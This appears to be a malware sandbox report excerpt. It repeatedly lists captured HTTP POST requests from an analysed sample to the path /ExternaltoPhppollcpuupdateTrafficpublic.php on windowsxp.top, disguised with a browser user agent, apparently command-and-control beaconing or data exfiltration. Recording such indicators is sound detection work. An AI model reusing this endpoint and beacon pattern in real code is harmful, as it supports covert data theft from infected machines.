                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1692Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
